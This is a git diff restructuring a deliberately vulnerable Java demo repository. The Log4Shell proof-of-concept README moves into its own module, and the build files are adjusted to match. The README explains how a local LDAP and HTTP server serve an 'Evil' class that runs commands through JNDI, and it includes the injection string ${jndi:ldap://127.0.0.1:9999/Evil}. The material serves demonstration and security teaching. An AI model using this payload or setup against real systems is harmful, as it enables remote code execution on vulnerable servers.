diff --git a/README.md b/README.md
index dc5bb06062..b9e44272f0 100644
--- a/README.md
+++ b/README.md
@@ -1,98 +1,8 @@
-## Log4Shell Proof of Concept
+## Java Goof
 
-The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
+This is a collection of Java demo apps that are vulnerable in different ways.
 
-This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
-The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
+It's divided into modules, each one having its own README:
 
-For more information about the exploit and the mechanics of how it works, 
-[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).
-
-### Requirements
-
-You'll need one of the following Java SDKs:
-  * 11.0.1 or earlier
-  * 8u191 or earlier
-  * 7u201 or earlier
-  * 6u211 or earlier
-
-Java SDKs newer than those versions don't have the same vulnerability.
-
-### Building the PoC
-
-In the root folder, run:
-
-```
-./mvnw clean install
-```
-
-**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
-
-### Running the PoC
-
-This repo has two modules: server and client.
-
-The server module runs a lean LDAP & HTTP server.
-
-The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a
-Java class that will be deserialized and executed.
-
-The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`.
-
-`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While
-the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it
-writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine.
-
-This PoC should run as-is on Linux or Mac.
-
-Open a terminal window and run the following:
-
-```
-cd log4shell-server
-../mvnw exec:java -Dexec.mainClass="Server"
-```
-
-You should see output that looks like the following:
-
-```
-[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server ---
-LDAP server listening on 0.0.0.0:9999
-HTTP server listening on 0.0.0.0:8000
-```
-
-In another terminal window, run the following:
-
-```
-cd log4shell-client
-JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
-../mvnw exec:java -Dexec.mainClass="Main"
-```
-
-**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
-For example, you can download JDK 8u111 
-[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download
-and install the version for Mac, the above command will work for you.
-
-You should see output that looks like the following:
-
-```
-[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client ---
----------- JVM Props -------------
-java.vm.version=25.111-b14
-java.vm.vendor=Oracle Corporation
-java.vm.name=Java HotSpot(TM) 64-Bit Server VM
-java.vm.specification.name=Java Virtual Machine Specification
-java.vm.specification.vendor=Oracle Corporation
-java.vm.specification.version=1.8
-java.vm.info=mixed mode
----------------------------------
-20:27:49.676 [Main.main()] ERROR Main - test
-/tmp/pwned DOES NOT EXIST
-20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
-/tmp/pwned EXISTS - yah been pwned!
-```
-
-**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the 
-`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
-client app to work properly. The file not being there and then being present after the attack is how it knows it's
-been successful.
\ No newline at end of file
+* [Todolist Goof](todolist-goof/README.md)
+* [Log4Shell Goof](log4shell-goof/README.md)
diff --git a/log4shell-goof/README.md b/log4shell-goof/README.md
index b08c620530..d5552faabc 100644
--- a/log4shell-goof/README.md
+++ b/log4shell-goof/README.md
@@ -1,7 +1,10 @@
-## Log4Shell Proof of Concept
+## Log4Shell Goof
 
 The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
 
+This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
+The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
+
 For more information about the exploit and the mechanics of how it works, 
 [here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).
 
@@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability.
 In the root folder, run:
 
 ```
-./mvnw clean install
+mvn clean install
 ```
 
 **NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
@@ -46,7 +49,7 @@ Open a terminal window and run the following:
 
 ```
 cd log4shell-server
-../mvnw exec:java -Dexec.mainClass="Server"
+mvn exec:java -Dexec.mainClass="Server"
 ```
 
 You should see output that looks like the following:
@@ -62,7 +65,7 @@ In another terminal window, run the following:
 ```
 cd log4shell-client
 JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
-../mvnw exec:java -Dexec.mainClass="Main"
+mvn exec:java -Dexec.mainClass="Main"
 ```
 
 **NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
@@ -92,4 +95,4 @@ java.vm.info=mixed mode
 **NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the 
 `/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
 client app to work properly. The file not being there and then being present after the attack is how it knows it's
-been successful.
\ No newline at end of file
+been successful.
diff --git a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class
index 7deca81203..9eca5167dc 100644
Binary files a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class and b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class differ
diff --git a/log4shell-goof/pom.xml b/log4shell-goof/pom.xml
index e902f400a4..6eb158372a 100644
--- a/log4shell-goof/pom.xml
+++ b/log4shell-goof/pom.xml
@@ -2,12 +2,6 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
   <modelVersion>4.0.0</modelVersion>
 
-    <parent>
-        <artifactId>java-goof</artifactId>
-        <groupId>io.github.snyk</groupId>
-        <version>1.0-SNAPSHOT</version>
-    </parent>
-
   <groupId>io.snyk</groupId>
   <artifactId>log4shell-poc</artifactId>
   <version>0.0.1-SNAPSHOT</version>
diff --git a/Dockerfile b/todolist-goof/Dockerfile
similarity index 66%
rename from Dockerfile
rename to todolist-goof/Dockerfile
index 1e9063df6e..d37dfaeafa 100644
--- a/Dockerfile
+++ b/todolist-goof/Dockerfile
@@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install
 FROM tomcat:8.5.21
 
 RUN mkdir /tmp/extracted_files
-COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml
-COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
+COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
+COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
 COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
 COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
diff --git a/todolist-goof/README.md b/todolist-goof/README.md
index 9e03f33bba..c458877c4d 100644
--- a/todolist-goof/README.md
+++ b/todolist-goof/README.md
@@ -1,4 +1,4 @@
-## Java Goof
+## Todolist Goof
 
 A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). 
 
diff --git a/todolist-goof/pom.xml b/todolist-goof/pom.xml
index 5753769164..4df79d1b1b 100644
--- a/todolist-goof/pom.xml
+++ b/todolist-goof/pom.xml
@@ -2,12 +2,6 @@
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
-    <parent>
-        <artifactId>java-goof</artifactId>
-        <groupId>io.github.snyk</groupId>
-        <version>0.0.1-SNAPSHOT</version>
-    </parent>
-
     <groupId>io.github.snyk</groupId>
     <artifactId>todolist-mvc</artifactId>
     <version>0.0.1-SNAPSHOT</version>
diff --git a/todolist-goof/todolist-web-common/pom.xml b/todolist-goof/todolist-web-common/pom.xml
index 25f60795b9..59b055ec94 100644
--- a/todolist-goof/todolist-web-common/pom.xml
+++ b/todolist-goof/todolist-web-common/pom.xml
@@ -38,7 +38,7 @@
         <dependency>
             <groupId>io.github.snyk</groupId>
             <artifactId>todolist-core</artifactId>
-            <version>1.0-SNAPSHOT</version>
+            <version>0.0.1-SNAPSHOT</version>
         </dependency>
 
         <!-- javaee web api -->
diff --git a/todolist-goof/todolist-web-struts/pom.xml b/todolist-goof/todolist-web-struts/pom.xml
index 60ea931624..54a356000b 100644
--- a/todolist-goof/todolist-web-struts/pom.xml
+++ b/todolist-goof/todolist-web-struts/pom.xml
@@ -21,7 +21,7 @@
                     <artifactId>javaee-web-api</artifactId>
                 </exclusion>
             </exclusions>
-            <version>1.0-SNAPSHOT</version>
+            <version>0.0.1-SNAPSHOT</version>
         </dependency>
 
         <!-- javaee web api -->